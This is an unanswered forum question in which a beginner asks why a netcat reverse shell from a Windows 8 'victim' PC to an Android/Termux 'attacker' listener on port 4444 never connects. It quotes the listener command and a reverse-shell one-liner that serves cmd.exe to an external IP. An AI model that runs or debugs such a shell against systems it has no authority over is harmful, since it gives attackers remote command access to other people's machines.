Having issues with netcat connecting to external port

0

I'm in a situation where I don't understand whats's happening. The attacker machine is an android running from mobile wifi running termux and I type in this command:

nc -nvlp 4444

On the other hand the victim pc is a PC running windows 8 and I typed in this command:

nc -nv android.external.ip 4444 -e cmd.exe

Maybe I'm putting in a wrong address or what?

But nothing seems to happen on the attacker device. I'm sure this is an easy problem and I'm not too smart to understand it so guys, please, help me, I really don't understand what's going on...

Thank you for the answers I hope you will have a great day!

user12315589

Posted 2019-12-30T02:23:37.360

Reputation: 1

No answers